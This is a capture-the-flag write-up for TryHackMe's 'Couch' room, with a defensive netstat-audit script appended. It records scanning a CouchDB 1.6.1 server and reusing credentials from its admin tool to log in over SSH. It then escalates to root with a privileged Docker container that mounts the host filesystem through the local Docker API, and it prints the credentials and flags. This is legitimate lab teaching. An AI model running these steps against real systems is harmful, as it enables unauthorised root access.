TryHackMe - Couch - Writeup

Couch

Hack into a vulnerable database server that collects and stores data in JSON-based document formats, in this semi-guided challenge.

Nmap Scanning

root@ip-10-10-125-194:~# rustscan -a 10.10.26.209 --range 1-10000
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.26.209:22
Open 10.10.26.209:5984
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p  ")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-30 19:22 UTC
Initiating Ping Scan at 19:22
Scanning 10.10.26.209 [2 ports]
Completed Ping Scan at 19:22, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:22
Completed Parallel DNS resolution of 1 host. at 19:22, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:22
Scanning ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209) [2 ports]
Discovered open port 22/tcp on 10.10.26.209
Discovered open port 5984/tcp on 10.10.26.209
Completed Connect Scan at 19:22, 0.00s elapsed (2 total ports)
Nmap scan report for ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209)
Host is up, received conn-refused (0.00055s latency).
Scanned at 2021-06-30 19:22:25 UTC for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
5984/tcp open  couchdb syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

Nmap Scanning 2

root@ip-10-10-125-194:~# nmap -sCV -A -p5984 10.10.26.209 -T3

Starting Nmap 7.60 ( https://nmap.org ) at 2021-06-30 20:23 BST
Nmap scan report for ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209)
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
5984/tcp open  http    CouchDB httpd 1.6.1 (Erlang OTP/18)
|_http-server-header: CouchDB/1.6.1 (Erlang OTP/18)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 02:CE:03:61:C9:1D (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose|phone|webcam
Running (JUST GUESSING): Asus embedded (94%), Linux 3.X|4.X|2.6.X (94%), Google Android 5.X|6.X|7.X (92%)
OS CPE: cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.16 cpe:/o:google:android:5.1 cpe:/o:google:android:6 cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.17
Aggressive OS guesses: ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Android 5.1 (92%), Android 6.0-7.1.2 (Linux 3.18-4.4.1) (92%), Linux 3.13 (92%), Linux 3.2 - 3.10 (92%), Linux 3.2 - 3.16 (92%), Linux 3.2 - 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.42 ms ip-10-10-26-209.eu-west-1.compute.internal (10.10.26.209)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.08 seconds

[ Note: I am new to rustscan; I will learn more about it. ]

Task 1 Ready Set Go

Question: Scan the machine, how many ports are open?

Answer: 2

Question: What is the database management system installed on the server?

Answer: couchdb

Question: What port is the database management system running on?

Answer: 5984

Question: What is the version of the management system installed on the server?

Answer: 1.6.1

Question: What is the path for the web administration tool of this database management system?

Answer: _utils (reference: Stackoverflow answer)

Question: What is the path to list all databases in the web browser of the database management system?

Answer: _all_dbs (reference: tutorialkart, Get Database List using REST API)

Question: What are the credentials found in the web administration tool?

Answer: atena:t4qfzcc4qN

Secret Database

root@ip-10-10-125-194:~# ssh atena@10.10.26.209
The authenticity of host '10.10.26.209 (10.10.26.209)' can't be established.
ECDSA key fingerprint is SHA256:TtfUUNS6Ivob4iQ7X414863lCCc1q2YyzzycIkRTZ3k.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.26.209' (ECDSA) to the list of known hosts.
atena@10.10.26.209's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-193-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Fri Dec 18 15:25:27 2020 from 192.168.85.1
atena@ubuntu:~$ 
atena@ubuntu:~$ ls
user.txt
atena@ubuntu:~$ cat user.txt
THM{1ns3cure_couchdb}
atena@ubuntu:~$ 

Log in to the SSH server using the credentials and

Question: Compromise the machine and locate user.txt

Answer: THM{1ns3cure_couchdb}

atena@ubuntu:/tmp$ netstat -antup
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:5984            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:40073         0.0.0.0:*               LISTEN      -               
tcp        0      0 10.10.136.71:22         10.10.250.123:48324     ESTABLISHED -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -       

I saw that the Docker daemon's API was listening on 127.0.0.1:2375 on the machine. From the HackTricks blog I found a privilege-escalation technique for an exposed Docker API that escapes the container boundary: run a privileged container with the host's root filesystem mounted and read the host's files from inside it.

atena@ubuntu:/tmp$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
/ # ls /mnt
bin             home            lib64           opt             sbin            usr
boot            initrd.img      lost+found      proc            srv             var
dev             initrd.img.old  media           root            sys             vmlinuz
etc             lib             mnt             run             tmp             vmlinuz.old
/ # ls /mnt/root/
root.txt
/ # cat /mnt/root/root.txt
THM{RCE_us1ng_Docker_API}
/ # 
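As an added example (not part of the original writeup), here is a small audit script a defender could run over `netstat -antup` output like the listing above: it parses the TCP listeners and flags the two services this box exposes, the plaintext Docker API on 2375 and CouchDB bound to every interface. The sample output is constructed from the writeup's listing and the port-to-risk table is my own.

```python
"""Audit `netstat -antup` output for risky TCP listeners (added example).

Docker's TCP API on 2375 carries no TLS and no authentication, so any user
who can reach it can start a privileged container and become root on the
host; CouchDB on 0.0.0.0 is reachable from the network and must have admins.
"""
import re
from typing import List, Tuple

# Constructed sample, shortened from the netstat listing in the writeup.
NETSTAT_SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5984            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:2375          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:40073         0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.136.71:22         10.10.250.123:48324     ESTABLISHED -
tcp6       0      0 :::22                   :::*                    LISTEN      -
"""

# Ports whose presence as a listener is worth a finding (my own table).
RISKY_PORTS = {
    2375: "Docker API without TLS: local users can run a privileged container as root",
    2376: "Docker API TLS port: confirm --tlsverify and client certificates are enforced",
    5984: "CouchDB HTTP API: confirm admins exist (no 'admin party') and bind_address is not 0.0.0.0",
}

# proto, recv-q, send-q, local addr:port, foreign addr, state LISTEN
LISTEN_RE = re.compile(r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN")

def parse_listeners(netstat_output: str) -> List[Tuple[str, int]]:
    """Return (bind_address, port) for every TCP socket in LISTEN state."""
    listeners = []
    for line in netstat_output.splitlines():
        m = LISTEN_RE.match(line)
        if m:
            listeners.append((m.group(2), int(m.group(3))))
    return listeners

def audit(netstat_output: str) -> List[str]:
    """One finding string per risky listener, annotated with its exposure."""
    findings = []
    for addr, port in parse_listeners(netstat_output):
        if port in RISKY_PORTS:
            exposure = "loopback only" if addr in ("127.0.0.1", "::1") else f"all interfaces ({addr})"
            findings.append(f"{addr}:{port} [{exposure}] {RISKY_PORTS[port]}")
    return findings

if __name__ == "__main__":
    for finding in audit(NETSTAT_SAMPLE):
        print(finding)
```

Note that 2375 bound to loopback still matters: every local account, including a low-privileged one like atena, can reach it.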

Question: Escalate privileges and obtain root.txt

Answer: THM{RCE_us1ng_Docker_API}

Room link: Couch

Written on July 2, 2021